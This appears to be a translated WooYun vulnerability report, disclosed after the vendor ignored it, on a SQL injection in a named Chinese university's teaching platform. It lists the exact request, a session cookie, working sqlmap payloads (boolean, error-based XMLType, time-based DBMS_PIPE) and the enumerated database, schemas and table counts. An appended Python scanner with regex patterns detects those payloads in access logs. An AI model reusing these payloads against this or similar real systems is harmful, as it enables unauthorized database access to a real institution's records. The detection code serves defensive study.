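2015-11-26: Details reported to the vendor; awaiting vendor handling
2015-12-01: The vendor chose to ignore the vulnerability; details disclosed to the public
As per the title.
http://jxpt.cuc.edu.cn/ THEOL Network Teaching Integrated Platform - Communication University of China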
GET /resource/jpk/search.jsp?applylevel=-1&applyyear=0&coursetype=0&name=-1&subject1=0&subject2=0&university=%cf%c3%c3%c5%b4%f3%d1%a7 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://jxpt.cuc.edu.cn
Cookie: JSESSIONID=D059636EE102DDE9916439FF47FAC710
Host: jxpt.cuc.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
The name parameter is vulnerable to SQL injection.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: applylevel=-1&applyyear=0&coursetype=0&name=-9660' OR 4537=4537 AND 'LLwg' LIKE 'LLwg&subject1=0&subject2=0&university=%cf%c3%c3%c5%b4%f3%d1%a7

    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: applylevel=-1&applyyear=0&coursetype=0&name=-1' AND 5997=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(112)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (5997=5997) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(118)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND 'ARap' LIKE 'ARap&subject1=0&subject2=0&university=%cf%c3%c3%c5%b4%f3%d1%a7

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: applylevel=-1&applyyear=0&coursetype=0&name=-1' AND 2605=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(77)||CHR(70)||CHR(85),5) AND 'immB' LIKE 'immB&subject1=0&subject2=0&university=%cf%c3%c3%c5%b4%f3%d1%a7
---
web application technology: Apache 2.2.29, JSP
back-end DBMS: Oracle
current user: 'RESV2'
current schema (equivalent to database on Oracle): 'RESV2'
current user is DBA: True
available databases [8]:
[*] DBSNMP
[*] OUTLN
[*] RESV2
[*] SYS
[*] SYSTEM
[*] THEOLENV
[*] TSMSYS
[*] WMSYS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| OPERATION_LOG               | 399676  |
| USER_ROLE                   | 23467   |
| SITEVISITCOUNT              | 16403   |
| CLASSIFICATION              | 12481   |
| LIFECYCLE_CONTRIBUTEENTRY   | 4948    |
| LIFECYCLE_CONTRIBUTE        | 4946    |
| GENERAL_KEYWORD             | 3974    |
| ERESOURCE                   | 2596    |
| GENERAL                     | 2596    |
| LIFECYCLE                   | 2595    |
| TECHNICAL                   | 2594    |
| GENERAL_IDENTIFIER          | 2565    |
| GENERAL_DESCRIPTION         | 2558    |
| GENERAL_LANGUAGE            | 2557    |
| TECHNICAL_LOCATION          | 2556    |
| RES_JPK                     | 1881    |
| USER_VALUE                  | 1678    |
| RIGHTS                      | 1365    |
| GENERAL_COVERAGE            | 922     |
| DELETED_ERESOURCE           | 647     |
| FORMATVOCB                  | 607     |
| CLASSIFICATION_ARCHITECTURE | 448     |
| THEOL_FILES                 | 306     |
| EOL_FTP_LOG                 | 129     |
| EDUCATIONAL                 | 122     |
| STATISTICBYTIME             | 105     |
| BMFOLDER                    | 68      |
| EOL_FTP_FILES               | 52      |
| STATISTICPARAMETER          | 23      |
| BMRESOURCE                  | 17      |
| OPERATIONVOCB               | 15      |
| ROLEVOCB                    | 15      |
| ITEMTYPEVOCB                | 13      |
| KINDVOCB                    | 12      |
| REQUIREMENTTYPEVOCB         | 12      |
| LANGUAGE_COMPARISON         | 11      |
| "MODULE"                    | 10      |
| LEARNINGRESOURCETYPEVOCB    | 9       |
| RESSYSTEMSETTING            | 7       |
| DIFFICULTYVOCB              | 5       |
| INTERACTIVITYLEVELVOCB      | 5       |
| NOTEBOOK                    | 5       |
| ROLE                        | 5       |
| SECRECYVOCB                 | 5       |
| SEMANTICDENSITYVOCB         | 5       |
| STRUCTUREVOCB               | 5       |
| AGGREGATIONLEVELVOCB        | 4       |
| CASETYPEVOCB                | 4       |
| CONTEXTVOCB                 | 4       |
| INTENDEDENDUSERROLE         | 4       |
| RELATION                    | 4       |
| RELATION_DESCRIPTION        | 4       |
| RELATION_IDENTIFIER         | 4       |
| SCORELEVEL                  | 4       |
| STATUSVOCB                  | 4       |
| AUDIOSAMPLINGVOCB           | 3       |
| IDENTIFIER_CATALOG          | 3       |
| INTERACTIVITYTYPEVOCB       | 3       |
| PURPOSEVOCB                 | 3       |
| VIDEOSAMPLINGFORMATVOCB     | 3       |
| COPYRIGHTVOCB               | 2       |
| COSTVOCB                    | 2       |
| ITEMCATEGORYVOCB            | 2       |
| QUANTIZATIONVOCB            | 2       |
| REQUIREMENTKINDVOCB         | 2       |
| TESTCATEGORYVOCB            | 2       |
| TRACKVOCB                   | 2       |
| VERSIONTYPEVOCB             | 2       |
| CUSTOMIZE_COLLECTION        | 1       |
| EDU_EXTENSION               | 1       |
| EOL_FTP_ROLESETTING         | 1       |
+-----------------------------+---------+
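Added example, not part of the original report: a log-side check for the Oracle injection primitives visible in the sqlmap payloads above (quote-break tautology, XMLType error-based, DBMS_PIPE.RECEIVE_MESSAGE time-based), run over Apache-style access-log lines. The rule names, the scan_line and log_line helpers, the log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, quote

# Oracle injection primitives taken from the payload shapes in the report.
RULES = {
    "quote-break tautology": re.compile(r"'\s*(?:OR|AND)\s+(\d+)\s*=\s*\1\b", re.I),
    "error-based XMLType": re.compile(r"\bXMLType\s*\(", re.I),
    "time-based DBMS_PIPE": re.compile(r"\bDBMS_PIPE\s*\.\s*RECEIVE_MESSAGE\s*\(", re.I),
    "CHR() string building": re.compile(r"(?:\bCHR\s*\(\s*\d+\s*\)\s*\|\|\s*){2,}", re.I),
}

# Request field of a common/combined-format access-log line (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def scan_line(line):
    """Return a sorted list of (parameter, rule) hits for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    hits = set()
    # parse_qsl percent-decodes each value; bytes that are not valid UTF-8
    # (the GBK-encoded university parameter) are replaced instead of raising.
    for param, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        for rule, pattern in RULES.items():
            if pattern.search(value):
                hits.add((param, rule))
    return sorted(hits)


def log_line(name_value):
    """Build a constructed log line for search.jsp with the given name value."""
    path = ("/resource/jpk/search.jsp?applylevel=-1&name="
            + quote(name_value) + "&university=%cf%c3")
    return f'192.0.2.10 - - [26/Nov/2015:10:00:00 +0800] "GET {path} HTTP/1.1" 200 512'


# Constructed sample data: one benign request, two shaped like the report's payloads.
SAMPLES = [
    log_line("-1"),
    log_line("-9660' OR 4537=4537 AND 'LLwg' LIKE 'LLwg"),
    log_line("-1' AND 2605=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(77)||CHR(70)||CHR(85),5)"
             " AND 'immB' LIKE 'immB"),
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(scan_line(sample) or "clean")
```

Pattern matching on logs only surfaces probing after the fact; the injection itself is closed by binding name as a query parameter instead of concatenating it into the SQL string.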
Severity: No impact (ignored by vendor)
Ignored at: 2015-12-01 15:04
Vulnerability Rank: 4 (WooYun rating)
None yet